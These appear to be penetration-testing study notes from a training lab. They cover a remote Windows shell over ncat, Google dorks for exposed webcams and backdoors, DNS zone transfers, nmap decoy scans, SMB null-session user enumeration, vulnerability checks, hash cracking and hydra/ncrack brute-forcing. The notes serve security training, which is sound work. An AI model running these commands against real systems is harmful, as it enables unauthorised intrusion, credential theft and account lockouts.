-> On Kali client, connect to this port root@kali:~/Documents/ex143# ncat -v 10.11.7.94 4444 --ssl Ncat: Version 7.25BETA2 ( https://nmap.org/ncat ) Ncat: Subject: CN=localhost Ncat: Issuer: CN=localhost Ncat: SHA-1 fingerprint: 1CE9 9E10 B109 E5D0 F2BE C20A C22E 7EF8 A371 B226 Ncat: Certificate verification failed (self signed certificate). Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 2001-E79C
Directory of C:\Users\Administrator
-> capture with wireshark filters: host 10.11.7.94 and tcp port 4444 -> Example of connection without SSL:
Information gathering - Google
-> only results on microsoft.com site:microsoft.com
-> exclude www.microsoft.com -site:wwww.microsoft.com
-> filter for filetypes (example pdf) filetype:pdf
-> Example: all pdfs on microsoft.com and its subdomains containing 'virtual' site:microsoft.com -site:www.microsoft.com filetype:pdf "virtual"
-> filter for text in html header / title -> Open VNC ports: intitle:"VNC viewer for Java" -> Webcam: inurl:"/control/userimage.html"
-> PHP myAdmin dump: inurl:php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin
-> PHP Backdoor: intitle:"-N3t" filetype:php undetectable
Google Hacking Database (GHDB) -> https://www.exploit-db.com/google-hacking-database/
Information gathering - Web Resources Webserver stats -> https://searchdns.netcraft.com/
Information gathering - DNS Example to gather DNS details:
1) Get the DNS Servers:
host -t ns megacorpone.com
megacorpone.com name server ns1.megacorpone.com. megacorpone.com name server ns3.megacorpone.com. megacorpone.com name server ns2.megacorpone.com.
2) Create list of possible subdomain names:
cat subdomain.list
www www2 ftp sftp pubs root admin mail owa mx ns router proxy cisco dns sql mysql
3) Bruteforce domain names:
for ip in $(cat subdomain.list);do host $ip.megacorpone.com;done
4) Bruteforce reverse lookup (seq to limit IP range):
for ip in $(seq 76 91);do host 38.100.193.$ip;done |grep megacorp
Loop in Windows CMD:
for /l %i in (1, 1, 10) do ping -n 1 10.0.0.%i
5) Bruteforce zone transfer with bash script: #!/bin/bash for server in $(host -t ns $1 |cut -d" " -f4);do host -l $1 $server |grep 'has address' done
-> testing script:
./zonetransfer.sh megacorpone.com
admin.megacorpone.com has address 38.100.193.83 beta.megacorpone.com has address 38.100.193.69 fs1.megacorpone.com has address 38.100.193.82 intranet.megacorpone.com has address 38.100.193.81 mail.megacorpone.com has address 38.100.193.84 mail2.megacorpone.com has address 38.100.193.73 ns1.megacorpone.com has address 38.100.193.70 ns2.megacorpone.com has address 38.100.193.80 ns3.megacorpone.com has address 38.100.193.90 router.megacorpone.com has address 38.100.193.91 siem.megacorpone.com has address 38.100.193.89 snmp.megacorpone.com has address 38.100.193.85 support.megacorpone.com has address 173.246.47.170 syslog.megacorpone.com has address 38.100.193.66 test.megacorpone.com has address 38.100.193.67 vpn.megacorpone.com has address 38.100.193.77 www.megacorpone.com has address 38.100.193.76 www2.megacorpone.com has address 38.100.193.79
6) Alternative: Use dnsrecon:
dnsrecon -d megacorpone.com -t axfr
7) Alternative: Use dnsenum:
dnsenum megacorpone.com
Information gathering - The Harvester Example: # theharvester -d vmware.com -b google -v -n
Information gathering - recon-ng
recon-ng
Information gathering - nmap
Don’t forget to scan UDP ports
But UDP port scans are unreliable because ICMP packets on UDP can get lost on the way
Most port scanners only show a certain list of ports, not all (nmap only scans 1000 most popular ports)
Measuring the traffic produced by a port scan: root@kali:# iptables -I INPUT 1 -s 10.0.0.54 -j ACCEPT root@kali:# iptables -I OUTPUT 1 -d 10.0.0.54 -j ACCEPT root@kali:# iptables -Z root@kali:# nmap -sT 10.0.0.54
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 06:48 EST Nmap scan report for ad.moshpit.local (10.0.0.54) Host is up (0.00036s latency). Not shown: 981 filtered ports PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49159/tcp open unknown MAC Address: 00:50:56:A7:BE:75 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds
root@kali:~# iptables -vn -L Chain INPUT (policy ACCEPT 171 packets, 12129 bytes) pkts bytes target prot opt in out source destination 20 1238 ACCEPT all -- * * 10.0.0.54 0.0.0.0/0
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 92 packets, 15464 bytes) pkts bytes target prot opt in out source destination 2031 122K ACCEPT all -- * * 0.0.0.0/0 10.0.0.54
-> 122kb data have been sent through the network to scan this single IP address
root@kali:# nmap -sT -p 1-65535 10.0.0.54 root@kali:# iptables -vn -L Chain INPUT (policy ACCEPT 79 packets, 5817 bytes) pkts bytes target prot opt in out source destination 139 8378 ACCEPT all -- * * 10.0.0.54 0.0.0.0/0
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 44 packets, 5576 bytes) pkts bytes target prot opt in out source destination 197K 12M ACCEPT all -- * * 0.0.0.0/0 10.0.0.54
-> A full portscan against the same IP address produced 12MB of traffic
Performing a ping sweep (ICMP only) with nmap. Hosts that drop or reject ICMP packets won’t show as up.
Using -oG to redirect the output as ‘greppable’ into a file, then print the results:
root@kali:# nmap -oG pingsweep.list -sn 10.0.0.1-254 root@kali:# grep 'Up' pingsweep.list |cut -d" " -f 2
Performing another sweep, this time against port 80 in the IP range.
root@kali:# nmap -oG websweep.list -p80 10.0.0.1-254 root@kali:# grep 'open' websweep.list |cut -d" " -f2
Sweep for top 20 interesting ports in the IP range.
root@kali:~# nmap -sT -A --top-ports=20 10.0.0.1-100 -oG top20sweep.list
Fingerprinting and guessing the OS by inspecting the TCP/IP stack and TTL values using Option: -O
root@kali:~# nmap -O 10.0.0.54 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 07:10 EST Nmap scan report for ad.moshpit.local (10.0.0.54) Host is up (0.00024s latency). Not shown: 981 filtered ports PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49159/tcp open unknown MAC Address: 00:50:56:A7:BE:75 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose Running: Microsoft Windows 2012 OS CPE: cpe:/o:microsoft:windows_server_2012:r2 OS details: Microsoft Windows Server 2012 or Windows Server 2012 R2
Banner grabbing and Service Enumeration by running scripts against the open ports using -sV and -A parameters.
root@kali:~# nmap -sV -sT -A 10.0.0.54 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 07:13 EST Nmap scan report for ad.moshpit.local (10.0.0.54) Host is up (0.00032s latency). Not shown: 981 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2017-02-15 12:13:50Z)
135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: moshpit.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: MOSHPIT)
464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: moshpit.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped 3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=ad.moshpit.local | Not valid before: 2016-12-17T15:00:35
|_Not valid after: 2017-06-18T15:00:35 |_ssl-date: 2017-02-15T12:14:45+00:00; -20s from scanner time. 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC MAC Address: 00:50:56:A7:BE:75 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose Running: Microsoft Windows 2012 OS CPE: cpe:/o:microsoft:windows_server_2012:r2 OS details: Microsoft Windows Server 2012 or Windows Server 2012 R2 Network Distance: 1 hop Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: -20s, deviation: 0s, median: -20s
|_nbstat: NetBIOS name: AD, NetBIOS user: , NetBIOS MAC: 00:50:56:a7:be:75 (VMware)
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::- | Computer name: ad | NetBIOS computer name: AD | Domain name: moshpit.local | Forest name: moshpit.local | FQDN: ad.moshpit.local |_ System time: 2017-02-15T04:14:45-08:00
| smb-security-mode:
| account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required |_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE HOP RTT ADDRESS 1 0.32 ms ad.moshpit.local (10.0.0.54)
Post-scan script results:
| clock-skew:
|_ -20s: Majority of systems scanned
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.38 seconds
NSE, the Nmap Scripting Engine, can be used to write routines and scripts. Scripts are stored in:
/usr/share/nmap/scripts/
As an example, this script connects via SMB to determine the OS running on the host:
root@kali:~# nmap jumpbox.moshpit.local --script smb-os-discovery.nse
DNS zone transfer enumeration can also be scripted:
root@kali:~# nmap --script=dns-zone-transfer -p 53 ad.moshpit.local
Use ‘Decoy’ to spoof sender from different hosts to remain undetected. Example:
root@kali:~# nmap -D 10.0.0.112,10.0.0.122,me,10.0.0.108 10.0.0.99
Scan IP range for open SMB ports, redirect to file, then print list:
root@kali:# nmap -v -p 139,445 -oG smb.list 10.0.0.1-254 root@kali:# cat smb.list |grep open |cut -d" " -f2,3 |awk '{print $1, $2}’
Alternative: Use nbtscan. Example:
root@kali:~# nbtscan -r 10.0.0.0/14
Using enum4linux to collect SMB data:
root@kali:~# enum4linux -a 10.0.0.119 (server2003lol.moshpit.local)
[+] Got OS info for 10.0.0.119 from smbclient: Domain=[MOSHPIT] OS=[Windows Server 2003 3790] Server=[Windows Server 2003 5.2]
[+] Server 10.0.0.119 allows sessions using username '', password '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
root@kali:~# enum4linux -a 10.0.0.120
[+] Got OS info for 10.0.0.120 from smbclient: Domain=[ROFL-RCBQSVYS8K] OS=[Windows XP 3790 Service Pack 1] Server=[Windows XP 5.2]
[+] Server 10.0.0.120 allows sessions using username '', password ‘' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
Checking for specific vulnerabilities:
root@kali:~# nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe-1 10.0.0.120
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 09:43 EST NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:43 Completed NSE at 09:43, 0.00s elapsed Initiating ARP Ping Scan at 09:43 Scanning 10.0.0.120 [1 port] Completed ARP Ping Scan at 09:43, 0.02s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:43 Completed Parallel DNS resolution of 1 host. at 09:43, 0.00s elapsed Initiating SYN Stealth Scan at 09:43 Scanning rofl-rcbqsvys8k (10.0.0.120) [2 ports] Discovered open port 139/tcp on 10.0.0.120 Discovered open port 445/tcp on 10.0.0.120 Completed SYN Stealth Scan at 09:43, 0.02s elapsed (2 total ports) NSE: Script scanning 10.0.0.120. Initiating NSE at 09:43 Completed NSE at 09:43, 0.01s elapsed Nmap scan report for rofl-rcbqsvys8k (10.0.0.120) Host is up (0.00018s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:B4:31:C0 (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
NSE: Script Post-scanning. Initiating NSE at 09:43 Completed NSE at 09:43, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Vulnerability scanning - Nmap
Scan IP range for open Port 80: root@kali:~/exsmb# nmap -p 80 10.11.1.0/24 > httpopen.list
Format and redirect into file:
root@kali:~/exsmb# grep -B3 'tcp open' httpopen.list |grep report |cut -d" " -f5 > httpip.list
Use bash script to run Nmap script against all IPs in the list:
root@kali:~/exsmb# for ip in $(cat httpip.list);do nmap -v --script=http-vuln-cve2010-2861 -p 80 -v $ip; done
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 18:03 EST NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:03 Completed NSE at 18:03, 0.00s elapsed Initiating ARP Ping Scan at 18:03 Scanning 10.11.1.10 [1 port] Completed ARP Ping Scan at 18:03, 0.18s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:03 Completed Parallel DNS resolution of 1 host. at 18:04, 13.00s elapsed Initiating SYN Stealth Scan at 18:04 Scanning 10.11.1.10 [1 port] Discovered open port 80/tcp on 10.11.1.10 Completed SYN Stealth Scan at 18:04, 0.17s elapsed (1 total ports) NSE: Script scanning 10.11.1.10. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:04 Completed NSE at 18:04, 2.58s elapsed Nmap scan report for 10.11.1.10 Host is up, received arp-response (0.14s latency). Scanned at 2017-02-15 18:03:58 EST for 16s PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 128
| http-vuln-cve2010-2861:
| VULNERABLE: | Adobe ColdFusion Directory Traversal Vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2010-2861 OSVDB:67047
| Multiple directory traversal vulnerabilities in the administrator console
| in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the
| locale parameter | Disclosure date: 2010-08-10 | Extra information: | | JRun4\servers | Not vulnerable | CFusionMX7 | Not vulnerable | CFusionMX | Not vulnerable | ColdFusion8 | HMAC: F73A0EB9BC4889091F68D31373A050BFF86FFFA3 | Salt: 1487180906262 | Hash: AAFDC23870ECBCD3D557B6423A8982134E17927E | | References: | http://www.nessus.org/plugins/index.php?view=single&id=48340 | http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking | http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861 |_ http://osvdb.org/67047 MAC Address: 00:50:56:89:69:99 (VMware)
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 18:04 Completed NSE at 18:04, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 16.25 seconds Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
Check what kind of hash this is: # hash-identifier: HASH: AAFDC23870ECBCD3D557B6423A8982134E17927E Possible Hashs: [+] SHA-1
Crack Hash: **# echo **AAFDC23870ECBCD3D557B6423A8982134E17927E > sha1.hash # touch sha1.cracked # hashcat -m 110 --status -a 0 sha1.hash -o sha1.cracked
Information gathering - SMB Scanning for SMB open ports:
nmap -v --script=smb-enum-shares.nse -p 139,445 $ip
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-15 13:31 EST NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:31 Completed NSE at 13:31, 0.00s elapsed Initiating ARP Ping Scan at 13:31 Scanning 10.11.1.24 [1 port] Completed ARP Ping Scan at 13:31, 0.18s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:31 Completed Parallel DNS resolution of 1 host. at 13:31, 0.02s elapsed Initiating SYN Stealth Scan at 13:31 Scanning 10.11.1.24 [2 ports] Discovered open port 139/tcp on 10.11.1.24 Discovered open port 445/tcp on 10.11.1.24 Completed SYN Stealth Scan at 13:31, 0.18s elapsed (2 total ports) NSE: Script scanning 10.11.1.24. Initiating NSE at 13:31 Completed NSE at 13:31, 15.09s elapsed Nmap scan report for 10.11.1.24 Host is up (0.15s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:11:C6 (VMware)
Host script results:
| smb-enum-shares:
| account_used: | IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (payday server (Samba, Ubuntu)) | Users: 2 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | print$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers |_ Anonymous access:
Share allows access without credentials Connecting:
rpcclient 10.11.1.24 --port=139 --user=""
Get list of users:
rpcclient $> enumdomusers user:[games] rid:[0x3f2] user:[nobody] rid:[0x1f5] user:[proxy] rid:[0x402] user:[syslog] rid:[0x4b2] user:[www-data] rid:[0x42a] user:[root] rid:[0x3e8] user:[news] rid:[0x3fa] user:[bin] rid:[0x3ec] user:[mail] rid:[0x3f8] user:[dhcp] rid:[0x4b0] user:[daemon] rid:[0x3ea] user:[sshd] rid:[0x4bc] user:[man] rid:[0x3f4] user:[lp] rid:[0x3f6] user:[mysql] rid:[0x4b6] user:[dovecot] rid:[0x4b8] user:[gnats] rid:[0x43a] user:[backup] rid:[0x42c] user:[sys] rid:[0x3ee] user:[klog] rid:[0x4b4] user:[postfix] rid:[0x4ba] user:[list] rid:[0x434] user:[irc] rid:[0x436] user:[sync] rid:[0x3f0] user:[uucp] rid:[0x3fc]
Get details for user (Example: nobody):
rpcclient $> queryuser nobody User Name : nobody Full Name : nobody Home Drive : Dir Drive : (null) Profile Path: Logon Script: Description : Workstations: Comment : (null) Remote Dial : Logon Time : Wed, 31 Dec 1969 19:00:00 EST Logoff Time : never Kickoff Time : never Password last set Time : Wed, 31 Dec 1969 19:00:00 EST Password can change Time : Wed, 31 Dec 1969 19:00:00 EST Password must change Time: Wed, 31 Dec 1969 19:00:00 EST unknown_2[0..31]... user_rid : 0x1f5 group_rid: 0x201 acb_info : 0x00000010 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000000 padding1[0..7]... logon_hrs[0..21]...
User is member of group '0x201' Query the group:
rpcclient $> querygroup 0x201 Group Name: None Description: Ordinary Users Group Attribute:3 Num Members:0
Query privileges:
rpcclient $> enumprivs found 8 privileges
SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SePrintOperatorPrivilege 0:4097 (0x0:0x1001) SeAddUsersPrivilege 0:4098 (0x0:0x1002) SeDiskOperatorPrivilege 0:4099 (0x0:0x1003)
Query domain details:
rpcclient $> querydominfo Domain: MSHOME Server: PAYDAY Comment: payday server (Samba, Ubuntu) Total Users: 25 Total Groups: 0 Total Aliases: 0 Sequence No: 1487167074 Force Logoff: -1 Domain Server State: 0x1 Server Role: ROLE_DOMAIN_PDC Unknown 3: 0x1
Query user and groups (guessing the names):
rpcclient $> lookupnames Administrator result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupnames Administrators Administrators S-1-5-32-544 (Local Group: 4)
Get the SID of this domain:
rpcclient $> lookupdomain PAYDAY
SAMR_LOOKUP_DOMAIN: Domain Name: PAYDAY Domain SID: S-1-5-21-711259059-4024229656-2467103629
rpcclient $> lookupnames root root S-1-5-21-711259059-4024229656-2467103629-1000 (User: 1) rpcclient $> lookupnames mail mail S-1-5-21-711259059-4024229656-2467103629-1016 (User: 1) rpcclient $> lookupnames sys sys S-1-5-21-711259059-4024229656-2467103629-1006 (User: 1)
Now we have the SID structure: S-1-5-21-711259059-4024229656-2467103629-xxxx
Test for system accounts by replacing xxxx by 1000,1001,1002, etc.:
rpcclient $> lookupsids S-1-5-21-711259059-4024229656-2467103629-1002 S-1-5-21-711259059-4024229656-2467103629-1002 PAYDAY\daemon (1)
Vulnerability scanning - Open VAS
Setup Open VAS:
openvas-setup
Login to https://127.0.0.1:9392
Configure Targets
Configure Scans / Tasks
Password Attacks
1) Tools
Crunch: Create custom word lists. Example:
time crunch 6 6 0123456ABCDEF -o wordlist.txt
time = outputs time needed to generate 6 = min and max word length 0123456ABCDEF = the characters to include o = output file z 7z = compresses output file with 7zip
Pre-defined character sets can be found in: /usr/share/crunch/charset.lst Example to use:
time crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o wordlist.txt
PTH - Passing the hash
Ncrack: Brute force several modules:
FTP, SSH, Telnet, HTTP(S), POP3(S), SMB, RDP, VNC, SIP, Redis, PostgreSQL, MySQL
Particularly good against Windows RDP. Example:
ncrack -v -f --user administrator -P /usr/share/seclists/Passwords/10_million_password_list_top_1000000.txt rdp://10.0.0.12,CL=1
Hydra: Supports several services:
asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Example:
hydra -l admin -P /usr/share/seclists/Passwords/10_million_password_list_top_1000000.txt -v 192.168.0.23 ftp
Online Password attacks are noisy and can generate warnings and block user accounts or services:
Last updated